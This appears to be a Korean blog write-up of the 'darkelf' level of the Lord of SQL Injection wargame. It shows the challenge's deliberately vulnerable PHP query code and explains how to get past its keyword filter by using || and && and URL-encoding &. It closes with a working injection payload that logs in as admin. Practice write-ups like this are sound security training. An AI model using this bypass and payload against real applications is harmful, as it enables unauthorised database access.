반응형
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("darkelf");
highlight_file(__FILE__);
?>
|
cs |
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
이번에는 or과 and를 필터링한다. /i는 대소문자 구분을 하지 않기 때문에 대문자로 사용해도 필터링된다.
대신 or과 and를 ||과 &&로 바꿔서 사용해주면 된다.
url에 &을 직접 넣을 경우 값으로 들어가지 않기 때문에, url 인코딩을 한 %26으로 넣어주면 된다.
1' || '1'='1' %26%26 id='admin
반응형
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
LORD OF SQL INJECTION [troll] 풀이 (0) | 2019.10.29 |
---|---|
LORD OF SQL INJECTION [orge] 풀이 (0) | 2019.10.28 |
LORD OF SQL INJECTION [wolfman] 풀이 (0) | 2019.10.26 |
LORD OF SQL INJECTION [orc] 풀이 (0) | 2019.10.25 |
LORD OF SQL INJECTION [goblin] 풀이 (0) | 2019.10.24 |